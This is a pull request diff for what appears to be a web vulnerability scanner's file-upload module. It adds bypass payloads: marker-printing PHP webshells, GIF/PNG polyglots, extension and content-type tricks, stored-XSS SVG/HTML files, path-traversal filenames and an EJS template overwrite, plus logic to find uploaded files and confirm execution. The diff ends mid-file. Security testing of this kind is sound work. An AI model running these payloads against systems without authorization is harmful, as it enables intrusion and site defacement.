### PR TITLE
[fix] file upload 모듈 페이로드 추가, 검증 로직 수정

### DIFF
--- a/config/payloads/file_upload/file_upload_payloads.json
+++ b/config/payloads/file_upload/file_upload_payloads.json
@@ -1,21 +1,22 @@
 {
+  "markers": {
+    "rce_php": "WAF_UPLOAD_VULN_DETECTED",
+    "rce_node": "WAF_NODE_RCE_DETECTED",
+    "xss": "WAF_XSS_UPLOAD_DETECTED"
+  },
   "extensions": [
-    "php",
-    "php3",
-    "php4",
-    "php5",
-    "phtml",
-    "phar",
-    "inc",
-    "PhP",
-    "pHP",
-    "Php",
-    "php ",
-    "php.",
-    "php/."
+    "php", "php3", "php4", "php5", "phtml", "phar", "inc",
+    "js", "mjs", "cjs", "ts",
+    "html", "htm", "svg", "xml",
+    "ejs", "pug", "hbs",
+    "json", "yaml", "yml"
   ],
   "content_types": [
     "application/x-php",
+    "application/javascript",
+    "application/json",
+    "text/html",
+    "image/svg+xml",
     "image/jpeg",
     "image/gif",
     "text/plain"
@@ -26,25 +27,65 @@
     "receipt_2026",
     "document_vfinal",
     "upload",
-    "img"
+    "img",
+    "payload"
   ],
   "magic_byte_extensions": [
     "php5",
     "phtml",
-    "PhP"
+    "js",
+    "svg"
   ],
   "classic_payloads": [
     {
       "extension": "php%00.jpg",
       "prefix": "upload",
       "content_type": "image/jpeg",
-      "attack_type": "Null_Byte_Injection"
+      "attack_type": "Null_Byte_Injection_PHP",
+      "verify_mode": "rce"
     },
     {
       "extension": "php.jpg",
       "prefix": "document",
       "content_type": "image/jpeg",
-      "attack_type": "Double_Extension"
+      "attack_type": "Double_Extension_PHP",
+      "verify_mode": "rce"
+    },
+    {
+      "extension": "svg",
+      "prefix": "avatar",
+      "content_type": "image/svg+xml",
+      "attack_type": "Stored_XSS_SVG",
+      "verify_mode": "static",
+      "content": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert('WAF_XSS_UPLOAD_DETECTED')</script></svg>",
+      "content_probe": "<script>alert('WAF_XSS_UPLOAD_DETECTED')</script>"
+    },
+    {
+      "extension": "html",
+      "prefix": "document",
+      "content_type": "text/html",
+      "attack_type": "Stored_XSS_HTML",
+      "verify_mode": "static",
+      "content": "<html><body><script>alert('WAF_XSS_UPLOAD_DETECTED')</script></body></html>",
+      "content_probe": "<script>alert('WAF_XSS_UPLOAD_DETECTED')</script>"
+    },
+    {
+      "filename": "../../../../../tmp/pwned.js",
+      "extension": "js",
+      "content_type": "application/javascript",
+      "attack_type": "Path_Traversal_File_Write",
+      "verify_mode": "static",
+      "content": "// static probe\nconsole.log('WAF_XSS_UPLOAD_DETECTED');",
+      "content_probe": "console.log('WAF_XSS_UPLOAD_DETECTED')"
+    },
+    {
+      "filename": "../../views/index.ejs",
+      "extension": "ejs",
+      "content_type": "text/plain",
+      "attack_type": "Template_Overwrite_EJS",
+      "verify_mode": "template",
+      "content": "<%= 'WAF_NODE_RCE_DETECTED' %>",
+      "verify_paths": ["/"]
     }
   ]
 }

--- a/modules/file_upload/analyzer.py
+++ b/modules/file_upload/analyzer.py
@@ -13,19 +13,25 @@ SUCCESS_SIGNATURES = [
     r"uploads?/",
 ]
 
-ERROR_KEYWORDS = [
-    "failed",
+# Phrase-level only — bare "error"/"failed" false-positive on board XSS titles (onerror=).
+ERROR_PHRASES = (
+    "upload failed",
+    "failed to upload",
     "invalid file",
     "not uploaded",
-    "error",
     "not allowed",
     "forbidden file type",
-]
+    "file type not allowed",
+)
+
+
+def _response_indicates_upload_failure(res_lower: str) -> bool:
+    return any(phrase in res_lower for phrase in ERROR_PHRASES)
 
 
 def detect_file_upload(response, payload) -> tuple[bool, list[str]]:
     """
-    Detect probable successful upload from response content.
+    Stage-1: probable upload success (WAF bypass / storage), before active verification.
     """
     if not isinstance(payload, FilePayload):
         return False, []
@@ -34,8 +40,14 @@ def detect_file_upload(response, payload) -> tuple[bool, list[str]]:
     res_text = response.text or ""
     res_lower = res_text.lower()
 
-    if any(keyword in res_lower for keyword in ERROR_KEYWORDS):
+    if _response_indicates_upload_failure(res_lower):
         return False, evidences
+
+    response_url = str(getattr(response, "url", "") or "").lower()
+    if "/board" in response_url and (
+        "board-table" in res_lower or "/board/view?id=" in res_lower
+    ):
+        evidences.append(f"[BoardRedirect] post-submit listing ({response_url})")
 
     for pattern in SUCCESS_SIGNATURES:
         if re.search(pattern, res_lower, re.IGNORECASE):

--- a/modules/file_upload/form_helpers.py
+++ b/modules/file_upload/form_helpers.py
@@ -1,0 +1,168 @@
+from __future__ import annotations
+
+import re
+from typing import Any
+
+# Common file field names (no per-app exceptions such as DVWA-only "uploaded").
+_FILE_PARAM_HEURISTICS = frozenset(
+    {
+        "attachment",
+        "attachments",
+        "file",
+        "files",
+        "uploaded",
+        "uploadfile",
+        "userfile",
+        "image",
+        "images",
+        "document",
+        "doc",
+        "photo",
+        "media",
+        "avatar",
+        "binary",
+        "blob",
+    }
+)
+
+# URL path segments that suggest an upload endpoint.
+_URL_UPLOAD_HINTS = (
+    "upload",
+    "file",
+    "attach",
+    "attachment",
+    "media",
+    "avatar",
+    "import",
+    "document",
+)
+
+# Typical text/metadata fields — skip when inferring from upload-like surfaces.
+_TEXT_LIKE_PARAMS = frozenset(
+    {
+        "title",
+        "content",
+        "subject",
+        "body",
+        "description",
+        "message",
+        "summary",
+        "name",
+        "username",
+        "email",
+        "password",
+        "keyword",
+        "search",
+        "query",
+        "post_type",
+        "type",
+        "category",
+        "order_id",
+        "external_url",
+        "url",
+        "link",
+        "csrf",
+        "token",
+        "nonce",
+        "_token",
+        "authenticity_token",
+        "MAX_FILE_SIZE",
+        "max_file_size",
+    }
+)
+
+# Single-word names often used by submit buttons, not file inputs.
+_SUBMIT_LIKE_PARAMS = frozenset(
+    {
+        "submit",
+        "upload",
+        "send",
+        "save",
+        "go",
+        "ok",
+        "search",
+        "login",
+        "register",
+    }
+)
+
+_UPLOAD_FORM_DEFAULTS: dict[str, str] = {
+    "title": "waf-fuzzer-test",
+    "content": "waf-fuzzer-test",
+    "subject": "waf-fuzzer-test",
+    "body": "waf-fuzzer-test",
+    "description": "waf-fuzzer-test",
+    "message": "waf-fuzzer-test",
+    "name": "waf-fuzzer-test",
+    "summary": "waf-fuzzer-test",
+}
+
+_URL_HINT_PATTERN = re.compile(
+    r"(?:^|[/?_\-])(?:" + "|".join(re.escape(h) for h in _URL_UPLOAD_HINTS) + r")(?:$|[/?_\-])",
+    re.IGNORECASE,
+)
+
+
+def _is_heuristic_file_param(name: str) -> bool:
+    lower = name.lower()
+    if lower in _SUBMIT_LIKE_PARAMS:
+        return False
+    return (
+        lower in _FILE_PARAM_HEURISTICS
+        or lower.endswith("_file")
+        or lower.endswith("_upload")
+        or lower.endswith("_attachment")
+    )
+
+
+def _surface_likely_upload(surface: Any) -> bool:
+    url = str(getattr(surface, "url", "") or "")
+    if _URL_HINT_PATTERN.search(url):
+        return True
+    source_url = str(getattr(surface, "source_url", "") or "")
+    return bool(source_url and _URL_HINT_PATTERN.search(source_url))
+
+
+def select_upload_target_parameters(surface: Any, parameter_list: list[str]) -> list[str]:
+    """
+    Pick parameters likely to accept file content (module-local heuristics).
+
+    Priority:
+    1. Parameter name heuristics (uploaded, attachment, file, …)
+    2. Upload-like URL with non-text-like remaining fields
+    """
+    targets: list[str] = []
+    seen: set[str] = set()
+
+    for name in parameter_list:
+        key = str(name)
+        if key in seen:
+            continue
+        if _is_heuristic_file_param(key):
+            seen.add(key)
+            targets.append(key)
+
+    if targets:
+        return targets
+
+    if _surface_likely_upload(surface):
+        for name in parameter_list:
+            key = str(name)
+            if key in seen:
+                continue
+            if key.lower() in _TEXT_LIKE_PARAMS:
+                continue
+            seen.add(key)
+            targets.append(key)
+
+    return targets
+
+
+def fill_upload_form_defaults(req_params: dict[str, Any], attack_parameter: str) -> None:
+    """Fill empty non-file fields so server-side validation does not block uploads."""
+    for key, default in _UPLOAD_FORM_DEFAULTS.items():
+        if key == attack_parameter or key not in req_params:
+            continue
+        if str(req_params.get(key, "")).strip():
+            continue
+        req_params[key] = default

--- a/modules/file_upload/markers.py
+++ b/modules/file_upload/markers.py
@@ -1,0 +1,22 @@
+"""Markers and verification modes for active file-upload confirmation."""
+
+from __future__ import annotations
+
+# Backward-compatible PHP RCE marker (also used in generated webshells).
+RCE_PHP_MARKER = "WAF_UPLOAD_VULN_DETECTED"
+RCE_NODE_MARKER = "WAF_NODE_RCE_DETECTED"
+XSS_MARKER = "WAF_XSS_UPLOAD_DETECTED"
+
+VERIFY_RCE = "rce"
+VERIFY_STATIC = "static"
+VERIFY_TEMPLATE = "template"
+
+# If any of these appear alongside the marker, the response is source — not execution.
+PHP_SHELL_TAGS = ("<?php", "<?=", "<?", "&lt;?php", "&lt;?=")
+NODE_TEMPLATE_TAGS = ("<%=", "<%", "&lt;%=", "&lt;%")
+JSP_SHELL_TAGS = ("<%", "%>", "&lt;%")
+
+DEFAULT_SHELL_TAGS_BY_MODE: dict[str, tuple[str, ...]] = {
+    VERIFY_RCE: PHP_SHELL_TAGS + JSP_SHELL_TAGS,
+    VERIFY_TEMPLATE: NODE_TEMPLATE_TAGS,
+}

--- a/modules/file_upload/module.py
+++ b/modules/file_upload/module.py
@@ -4,6 +4,7 @@ from urllib.parse import urlsplit
 
 from modules.base_module import BaseModule
 from modules.file_upload.analyzer import detect_file_upload
+from modules.file_upload.form_helpers import select_upload_target_parameters
 from modules.file_upload.payloads import FilePayload, get_file_upload_payloads
 from modules.file_upload.verifier import EXECUTION_MARKER, extract_dynamic_verify_urls
 
@@ -23,10 +24,7 @@ class FileUploadModule(BaseModule):
         if method not in {"POST", "PUT", "PATCH"}:
             return ()
         parameter_list = [str(param) for param in parameters]
-        # DVWA and most upload forms use "uploaded" as the file field.
-        if "uploaded" in parameter_list:
-            return ["uploaded"]
-        return parameter_list
+        return select_upload_target_parameters(surface, parameter_list)
 
     def analyze(self, response, payload, elapsed_time, original_res=None, requester=None) -> bool:
         is_vuln, _ = detect_file_upload(response=response, payload=payload)

--- a/modules/file_upload/module.py
+++ b/modules/file_upload/module.py
@@ -5,8 +5,10 @@ from urllib.parse import urlsplit
 from modules.base_module import BaseModule
 from modules.file_upload.analyzer import detect_file_upload
 from modules.file_upload.form_helpers import select_upload_target_parameters
+from modules.file_upload.markers import VERIFY_TEMPLATE
 from modules.file_upload.payloads import FilePayload, get_file_upload_payloads
-from modules.file_upload.verifier import EXECUTION_MARKER, extract_dynamic_verify_urls
+from modules.file_upload.path_discovery import discover_verify_urls
+from modules.file_upload.verifier import build_verify_url_list, verify_upload_response
 
 
 class FileUploadModule(BaseModule):
@@ -41,33 +43,46 @@ class FileUploadModule(BaseModule):
         baseline_response=None,
     ) -> bool:
         """
-        Stage 2 verification: request uploaded file and confirm marker execution.
+        Stage-2 active verification:
+        - RCE: marker present, interpreter tags stripped (PHP/JSP/…)
+        - Static: malicious content served verbatim (Stored XSS on static hosts)
+        - Template: marker rendered on app routes (Node EJS overwrite)
         """
         if not isinstance(payload, FilePayload):
             return False
 
         split = urlsplit(surface.url)
         base = f"{split.scheme}://{split.netloc}"
-        seen: set[str] = set()
-        verify_urls: list[str] = []
+        upload_text = getattr(response, "text", "") or ""
+        headers = getattr(surface, "headers", None) or {}
+        cookies = getattr(surface, "cookies", None) or {}
+        source_url = getattr(surface, "source_url", None)
 
-        dynamic_urls = extract_dynamic_verify_urls(
+        verify_urls = await discover_verify_urls(
+            session,
             base_url=base,
-            response_text=getattr(response, "text", "") or "",
             filename=payload.filename,
+            upload_response_text=upload_text,
+            surface_url=str(surface.url),
+            source_url=str(source_url) if source_url else None,
+            payload=payload,
+            headers=headers,
+            cookies=cookies,
         )
-        for dynamic_url in dynamic_urls:
-            if dynamic_url in seen:
-                continue
-            seen.add(dynamic_url)
-            verify_urls.append(dynamic_url)
+
+        if not verify_urls and (payload.verify_mode or "").lower() == VERIFY_TEMPLATE:
+            verify_urls = build_verify_url_list(
+                base_url=base,
+                upload_response_text="",
+                payload=payload,
+                surface_url=str(surface.url),
+                include_fallback=False,
+            )
 
         if not verify_urls:
             return False
 
         request_kwargs = {}
-        headers = getattr(surface, "headers", None) or {}
-        cookies = getattr(surface, "cookies", None) or {}
         if headers:
             request_kwargs["headers"] = headers
         if cookies:
@@ -80,11 +95,8 @@ class FileUploadModule(BaseModule):
             except Exception:
                 continue
 
-            if EXECUTION_MARKER not in body:
-                continue
-            if "<?php" in body.lower() or "&lt;?php" in body.lower():
-                continue
-
-            return True
+            result = verify_upload_response(body, payload)
+            if result.verified:
+                return True
 
         return False

--- a/modules/file_upload/path_discovery.py
+++ b/modules/file_upload/path_discovery.py
@@ -1,0 +1,427 @@
+"""
+Upload path discovery for stage-2 verification (no hardcoded /uploads/).
+
+Strategies (in priority order):
+1. Parse upload response (JSON fields, HTML attributes, loose URL regex)
+2. GET related pages (form source, parent routes) and parse DOM for filename
+3. Probe common upload directory wordlist (fallback)
+"""
+
+from __future__ import annotations
+
+import json
+import re
+from html import unescape
+from html.parser import HTMLParser
+from typing import Any
+from urllib.parse import urljoin, urlsplit
+
+from bs4 import BeautifulSoup
+
+from modules.file_upload.markers import VERIFY_TEMPLATE
+
+# Frequently used static upload roots (fallback only).
+COMMON_UPLOAD_DIRS: tuple[str, ...] = (
+    "/uploads/",
+    "/upload/",
+    "/images/",
+    "/files/",
+    "/file/",
+    "/media/",
+    "/assets/",
+    "/static/uploads/",
+    "/public/uploads/",
+    "/public/",
+    "/data/",
+    "/storage/",
+    "/attachments/",
+    "/attachment/",
+    "/wp-content/uploads/",
+    "/content/uploads/",
+)
+
+_JSON_URL_KEYS = frozenset(
+    {
+        "url",
+        "path",
+        "file",
+        "filename",
+        "fileurl",
+        "file_url",
+        "filepath",
+        "file_path",
+        "location",
+        "src",
+        "href",
+        "download",
+        "downloadurl",
+        "link",
+    }
+)
+
+_HTML_ATTRS = (
+    ("img", "src"),
+    ("a", "href"),
+    ("script", "src"),
+    ("source", "src"),
+    ("link", "href"),
+    ("embed", "src"),
+    ("object", "data"),
+    ("video", "src"),
+    ("audio", "src"),
+)
+
+
+class _FilenamePathCollector(HTMLParser):
+    def __init__(self, filename: str) -> None:
+        super().__init__()
+        self._needle = filename.lower()
+        self.paths: set[str] = set()
+
+    def handle_starttag(self, tag: str, attrs: list[tuple[str, str | None]]) -> None:
+        for _key, value in attrs:
+            if value:
+                self._maybe_add(value)
+
+    def handle_data(self, data: str) -> None:
+        self._maybe_add(data)
+
+    def _maybe_add(self, value: str) -> None:
+        raw = unescape(value).strip().strip("'\"")
+        if raw and self._needle in raw.lower():
+            self.paths.add(raw)
+
+
+def _normalize_to_url(base_url: str, raw_path: str) -> str:
+    raw = unescape(raw_path).strip().strip("'\"")
+    if not raw:
+        return ""
+    if raw.startswith(("http://", "https://")):
+        return raw
+    if raw.startswith("//"):
+        split = urlsplit(base_url)
+        return f"{split.scheme}:{raw}"
+    normalized = raw if raw.startswith("/") else f"/{raw.lstrip('./')}"
+    return urljoin(base_url, normalized)
+
+
+def _extract_loose_url_regex(response_text: str, filename: str) -> set[str]:
+    escaped = re.escape(filename)
+    found: set[str] = set()
+    for match in re.findall(
+        rf"([^\s\"'<>]+{escaped}[^\s\"'<>]*)",
+        response_text,
+        re.IGNORECASE,
+    ):
+        found.add(unescape(match).strip().strip("'\""))
+    return found
+
+
+def _walk_json_for_filename(node: Any, filename: str, found: set[str]) -> None:
+    needle = filename.lower()
+
+    if isinstance(node, dict):
+        for key, value in node.items():
+            key_lower = str(key).lower()
+            if isinstance(value, str) and needle in value.lower():
+                if key_lower in _JSON_URL_KEYS or "/" in value or value.startswith("http"):
+                    found.add(value)
+            _walk_json_for_filename(value, filename, found)
+    elif isinstance(node, list):
+        for item in node:
+            _walk_json_for_filename(item, filename, found)
+    elif isinstance(node, str) and needle in node.lower():
+        if "/" in node or node.startswith("http"):
+            found.add(node)
+
+
+def extract_paths_from_text(response_text: str, filename: str) -> list[str]:
+    """Strategy 1: upload response body (JSON + HTML + regex)."""
+    if not response_text or not filename:
+        return []
+
+    paths: set[str] = set()
+    paths.update(_extract_loose_url_regex(response_text, filename))
+
+    stripped = response_text.strip()
+    if stripped.startswith(("{", "[")):
+        try:
+            parsed = json.loads(stripped)
+            _walk_json_for_filename(parsed, filename, paths)
+        except json.JSONDecodeError:
+            pass
+
+    collector = _FilenamePathCollector(filename)
+    try:
+        collector.feed(response_text)
+    except Exception:
+        pass
+    paths.update(collector.paths)
+
+    try:
+        soup = BeautifulSoup(response_text, "html.parser")
+        needle = filename.lower()
+        for tag, attr in _HTML_ATTRS:
+            for element in soup.find_all(tag):
+                value = element.get(attr)
+                if value and needle in str(value).lower():
+                    paths.add(str(value))
+    except Exception:
+        pass
+
+    return [path for path in paths if path]
+
+
+def build_fallback_urls(base_url: str, filename: str) -> list[str]:
+    """Strategy 3: common upload directories + filename."""
+    urls: list[str] = []
+    for directory in COMMON_UPLOAD_DIRS:
+        urls.append(urljoin(base_url, f"{directory.rstrip('/')}/{filename}"))
+    return urls
+
+
+# Patterns that indicate a "post/item detail" URL.
+# Matched against href values in listing pages.
+_POST_DETAIL_PATTERNS: tuple[re.Pattern, ...] = (
+    re.compile(r"/board/view\?", re.IGNORECASE),
+    re.compile(r"/post/view\?", re.IGNORECASE),
+    re.compile(r"/article/view\?", re.IGNORECASE),
+    re.compile(r"/bbs/view\?", re.IGNORECASE),
+    re.compile(r"[?&]id=\d+", re.IGNORECASE),
+    re.compile(r"/posts?/\d+", re.IGNORECASE),
+    re.compile(r"/articles?/\d+", re.IGNORECASE),
+    re.compile(r"/board/\d+", re.IGNORECASE),
+)
+
+_ID_FROM_URL = re.compile(r"[?&]id=(\d+)|/(\d+)(?:[/?#]|$)")
+
+
+def _extract_post_id(href: str) -> int:
+    m = _ID_FROM_URL.search(href)
+    if m:
+        return int(m.group(1) or m.group(2))
+    return -1
+
+
+def extract_post_detail_urls(
+    response_text: str,
+    base_url: str,
+    *,
+    max_posts: int = 5,
+) -> list[str]:
+    """
+    Strategy 2a: From a board-listing page (upload redirect target),
+    extract the most recently created post detail URLs so the next step
+    can scan them for embedded file links.
+
+    Posts are sorted by numeric ID descending (newest first).
+    """
+    if not response_text:
+        return []
+    try:
+        soup = BeautifulSoup(response_text, "html.parser")
+    except Exception:
+        return []
+
+    candidates: list[tuple[int, str]] = []
+    for tag in soup.find_all("a", href=True):
+        href = str(tag["href"])
+        if any(pat.search(href) for pat in _POST_DETAIL_PATTERNS):
+            full_url = urljoin(base_url, href)
+            post_id = _extract_post_id(href)
+            candidates.append((post_id, full_url))
+
+    # Highest ID first (newest post)
+    candidates.sort(key=lambda t: t[0], reverse=True)
+    seen: set[str] = set()
+    result: list[str] = []
+    for _, url in candidates:
+        if url not in seen:
+            seen.add(url)
+            result.append(url)
+            if len(result) >= max_posts:
+                break
+    return result
+
+
+def extract_file_links_from_page(page_text: str, base_url: str, filename: str) -> list[str]:
+    """
+    Strategy 2b: Inside a post detail page, find any hyperlink (a/img/…)
+    whose href/src contains the uploaded filename.
+    """
+    paths = extract_paths_from_text(page_text, filename)
+    urls: list[str] = []
+    seen: set[str] = set()
+    for raw in paths:
+        url = _normalize_to_url(base_url, raw)
+        if url and url not in seen:
+            seen.add(url)
+            urls.append(url)
+    return urls
+
+
+def iter_related_crawl_urls(*, surface_url: str, source_url: str | None) -> list[str]:
+    """Strategy 2c: Parent/sibling pages of the upload form."""
+    seen: set[str] = set()
+    ordered: list[str] = []
+
+    def add(raw: str) -> None:
+        if not raw or raw in seen:
+            return
+        seen.add(raw)
+        ordered.append(raw)
+
+    for raw in (source_url, surface_url):
+        if not raw:
+            continue
+        add(raw)
+        split = urlsplit(raw)
+        if not split.scheme or not split.netloc:
+            continue
+        base = f"{split.scheme}://{split.netloc}"
+        parts = [part for part in split.path.split("/") if part]
+        if len(parts) > 1:
+            parent_path = "/" + "/".join(parts[:-1])
+            add(urljoin(base, parent_path))
+            if split.query:
+                add(urljoin(base, f"{parent_path}?{split.query}"))
+        add(base)
+
+    return ordered
+
+
+def merge_verify_urls(
+    *,
+    base_url: str,
+    filename: str,
+    discovered_paths: list[str],
+    payload: Any,
+    surface_url: str = "",
+    include_fallback: bool = True,
+) -> list[str]:
+    """Dedupe with priority: explicit paths > discovered > fallback > template routes."""
+    ordered: list[str] = []
+    seen: set[str] = set()
+
+    def add_url(url: str) -> None:
+        if not url or url in seen:
+            return
+        seen.add(url)
+        ordered.append(url)
+
+    for path in getattr(payload, "verify_paths", None) or ():
+        add_url(urljoin(base_url, str(path)))
+
+    if (getattr(payload, "verify_mode", "") or "").lower() == VERIFY_TEMPLATE:
+        split = urlsplit(surface_url or base_url)
+        if split.scheme and split.netloc:
+            add_url(f"{split.scheme}://{split.netloc}/")
+
+    for raw_path in discovered_paths:
+        add_url(_normalize_to_url(base_url, raw_path))
+
+    if include_fallback:
+        for url in build_fallback_urls(base_url, filename):
+            add_url(url)
+
+    return ordered
+
+
+async def _fetch_text(
+    session: Any,
+    url: str,
+    request_kwargs: dict[str, Any],
+) -> str | None:
+    try:
+        async with session.get(url, **request_kwargs) as resp:
+            if resp.status >= 400:
+                return None
+            return await resp.text(errors="replace")
+    except Exception:
+        return None
+
+
+async def discover_verify_urls(
+    session: Any,
+    *,
+    base_url: str,
+    filename: str,
+    upload_response_text: str,
+    surface_url: str,
+    source_url: str | None,
+    payload: Any,
+    headers: dict[str, Any] | None = None,
+    cookies: dict[str, Any] | None = None,
+) -> list[str]:
+    """
+    Run all discovery strategies and return absolute URLs to probe.
+
+    Priority order:
+    1. Parse upload response text directly (JSON / HTML / regex)
+    2a. If upload response is a post listing, follow newest post detail pages
+        and extract file links from them  (stored_xss-style post tracking)
+    2b. GET related pages (form source / parent routes) and parse for filename
+    3. Common upload directory wordlist (fallback)
+    """
+    discovered_file_urls: list[str] = []
+    seen_file_urls: set[str] = set()
+
+    def add_file_url(url: str) -> None:
+        if url and url not in seen_file_urls:
+            seen_file_urls.add(url)
+            discovered_file_urls.append(url)
+
+    request_kwargs: dict[str, Any] = {}
+    if headers:
+        request_kwargs["headers"] = headers
+    if cookies:
+        request_kwargs["cookies"] = cookies
+
+    # --- Strategy 1: parse upload response directly ---
+    for path in extract_paths_from_text(upload_response_text, filename):
+        add_file_url(_normalize_to_url(base_url, path))
+
+    # --- Strategy 2a: post listing → detail page → file link ---
+    # The upload response is often a redirect to a board/listing page.
+    # Replicate stored_xss logic: find newest post links, visit each,
+    # and look for the uploaded filename inside.
+    post_detail_urls = extract_post_detail_urls(upload_response_text, base_url)
+
+    for detail_url in post_detail_urls:
+        detail_text = await _fetch_text(session, detail_url, request_kwargs)
+        if not detail_text:
+            continue
+        for url in extract_file_links_from_page(detail_text, base_url, filename):
+            add_file_url(url)
+        if discovered_file_urls:
+            # Filename found in a post → stop scanning more posts
+            break
+
+    # --- Strategy 2b: related pages (source, parent routes) ---
+    if not discovered_file_urls:
+        for page_url in iter_related_crawl_urls(
+            surface_url=surface_url, source_url=source_url
+        ):
+            page_text = await _fetch_text(session, page_url, request_kwargs)
+            if not page_text:
+                continue
+            for path in extract_paths_from_text(page_text, filename):
+                add_file_url(_normalize_to_url(base_url, path))
+
+            # This page itself might be a listing — follow its post detail links too
+            for detail_url in extract_post_detail_urls(page_text, base_url):
+                detail_text = await _fetch_text(session, detail_url, request_kwargs)
+                if not detail_text:
+                    continue
+                for url in extract_file_links_from_page(detail_text, base_url, filename):
+                    add_file_url(url)
+
+    # --- Strategy 3: common directory fallback ---
+    return merge_verify_urls(
+        base_url=base_url,
+        filename=filename,
+        discovered_paths=discovered_file_urls,
+        payload=payload,
+        surface_url=surface_url,
+        include_fallback=True,
+    )

--- a/modules/file_upload/payloads.py
+++ b/modules/file_upload/payloads.py
@@ -1,8 +1,22 @@
+from __future__ import annotations
+
+import base64
 import json
 import random
 import uuid
-from dataclasses import dataclass
+from dataclasses import dataclass, field
 from pathlib import Path
+
+from modules.file_upload.markers import (
+    RCE_NODE_MARKER,
+    RCE_PHP_MARKER,
+    VERIFY_RCE,
+    VERIFY_STATIC,
+    VERIFY_TEMPLATE,
+    XSS_MARKER,
+)
+
+_CONFIG_PATH = Path("config") / "payloads" / "file_upload" / "file_upload_payloads.json"
 
 
 @dataclass(slots=True, frozen=True)
@@ -11,9 +25,11 @@ class FilePayload:
     content: bytes
     content_type: str
     attack_type: str
-
-
-_CONFIG_PATH = Path("config") / "payloads" / "file_upload" / "file_upload_payloads.json"
+    verify_mode: str = VERIFY_RCE
+    marker: str = RCE_PHP_MARKER
+    content_probe: str = ""
+    shell_tags: tuple[str, ...] = field(default_factory=tuple)
+    verify_paths: tuple[str, ...] = field(default_factory=tuple)
 
 
 def _load_payload_config() -> dict:
@@ -31,10 +47,113 @@ def _load_payload_config() -> dict:
     return loaded
 
 
+def _marker_map(config: dict) -> dict[str, str]:
+    raw = config.get("markers", {})
+    if not isinstance(raw, dict):
+        raw = {}
+    return {
+        "rce_php": str(raw.get("rce_php", RCE_PHP_MARKER)),
+        "rce_node": str(raw.get("rce_node", RCE_NODE_MARKER)),
+        "xss": str(raw.get("xss", XSS_MARKER)),
+    }
+
+
+def _resolve_content(raw: object, *, default: bytes) -> bytes:
+    if raw is None:
+        return default
+    if isinstance(raw, str):
+        encoding = "utf-8"
+        if raw.startswith("base64:"):
+            return base64.b64decode(raw[7:], validate=False)
+        return raw.encode(encoding)
+    raise ValueError("payload content must be a string")
+
+
+def _build_filename(
+    *,
+    extension: str,
+    prefix: str,
+    base_names: list[str],
+    literal_filename: str = "",
+) -> str:
+    if literal_filename.strip():
+        return literal_filename.strip()
+    ext = extension.strip()
+    if not ext:
+        raise ValueError("extension is required when filename is not set")
+    if prefix and (".." in prefix or prefix.startswith(("/", "\\"))):
+        base = prefix.rstrip("/\\")
+        if ext.startswith("."):
+            return f"{base}{ext}"
+        return f"{base}.{ext}"
+    chosen_prefix = prefix or random.choice(base_names)
+    random_str = uuid.uuid4().hex[:6]
+    return f"{chosen_prefix}_{random_str}.{ext}"
+
+
+def _php_webshell(marker: str) -> bytes:
+    return f"<?php echo '{marker}'; unlink(__FILE__); ?>".encode()
+
+
+def _payload_from_classic(classic: dict, *, base_names: list[str], markers: dict[str, str]) -> FilePayload:
+    ext = str(classic.get("extension", "")).strip()
+    if not ext:
+        raise ValueError("classic_payloads entry requires extension")
+
+    verify_mode = str(classic.get("verify_mode", VERIFY_RCE)).strip().lower()
+    attack_type = str(classic.get("attack_type", f"Classic_{ext}")).strip()
+    content_type = str(classic.get("content_type", "application/octet-stream")).strip()
+    prefix = str(classic.get("prefix", "")).strip()
+    literal_filename = str(classic.get("filename", "")).strip()
+
+    if verify_mode == VERIFY_STATIC:
+        marker = str(classic.get("marker", markers["xss"])).strip()
+        default_content = (
+            f'<svg xmlns="http://www.w3.org/2000/svg">'
+            f'<script>alert("{marker}")</script></svg>'
+        ).encode()
+        content_probe = str(classic.get("content_probe", "")).strip() or marker
+    elif verify_mode == VERIFY_TEMPLATE:
+        marker = str(classic.get("marker", markers["rce_node"])).strip()
+        default_content = f"<%= '{marker}' %>".encode()
+        content_probe = ""
+    else:
+        marker = str(classic.get("marker", markers["rce_php"])).strip()
+        default_content = _php_webshell(marker)
+        content_probe = ""
+
+    content = _resolve_content(classic.get("content"), default=default_content)
+    if verify_mode == VERIFY_STATIC and not content_probe:
+        text = content.decode("utf-8", errors="replace")
+        content_probe = marker if marker in text else text[:120]
+
+    shell_tags = tuple(str(tag) for tag in classic.get("shell_tags", []) if str(tag))
+    verify_paths = tuple(str(path) for path in classic.get("verify_paths", []) if str(path))
+
+    return FilePayload(
+        filename=_build_filename(
+            extension=ext,
+            prefix=prefix,
+            base_names=base_names,
+            literal_filename=literal_filename,
+        ),
+        content=content,
+        content_type=content_type,
+        attack_type=attack_type,
+        verify_mode=verify_mode,
+        marker=marker,
+        content_probe=content_probe,
+        shell_tags=shell_tags,
+        verify_paths=verify_paths,
+    )
+
+
 def generate_payloads() -> list[FilePayload]:
     config = _load_payload_config()
+    markers = _marker_map(config)
+    php_marker = markers["rce_php"]
 
-    base_webshell = b"<?php echo 'WAF_UPLOAD_VULN_DETECTED'; unlink(__FILE__); ?>"
+    base_webshell = _php_webshell(php_marker)
     gif_webshell = b"GIF89a;\n" + base_webshell
     png_webshell = b"\x89PNG\r\n\x1a\n\0\0\0\rIHDR" + base_webshell
 
@@ -43,47 +162,67 @@ def generate_payloads() -> list[FilePayload]:
     content_types = [str(ct) for ct in config.get("content_types", []) if str(ct)]
     base_names = [str(name) for name in config.get("base_names", []) if str(name)] or ["upload"]
 
-    def get_random_filename(ext: str, prefix: str = "") -> str:
-        if not prefix:
-            prefix = random.choice(base_names)
-        random_str = uuid.uuid4().hex[:6]
-        return f"{prefix}_{random_str}.{ext}"
+    def random_filename(ext: str, prefix: str = "") -> str:
+        return _build_filename(extension=ext, prefix=prefix, base_names=base_names)
 
     for ext in extensions:
         for c_type in content_types:
-            filename = get_random_filename(ext)
+            filename = random_filename(ext)
             subtype = c_type.split("/", 1)[-1]
             payloads.append(
-                FilePayload(filename, base_webshell, c_type, f"Bypass_{ext}_CT_{subtype}")
+                FilePayload(
+                    filename=filename,
+                    content=base_webshell,
+                    content_type=c_type,
+                    attack_type=f"Bypass_{ext}_CT_{subtype}",
+                    verify_mode=VERIFY_RCE,
+                    marker=php_marker,
+                )
             )
 
-    payloads.append(FilePayload(get_random_filename("php", "avatar"), gif_webshell, "image/gif", "Magic_Byte_GIF"))
-    payloads.append(FilePayload(get_random_filename("php", "receipt"), png_webshell, "image/png", "Magic_Byte_PNG"))
+    payloads.append(
+        FilePayload(
+            random_filename("php", "avatar"),
+            gif_webshell,
+            "image/gif",
+            "Magic_Byte_GIF",
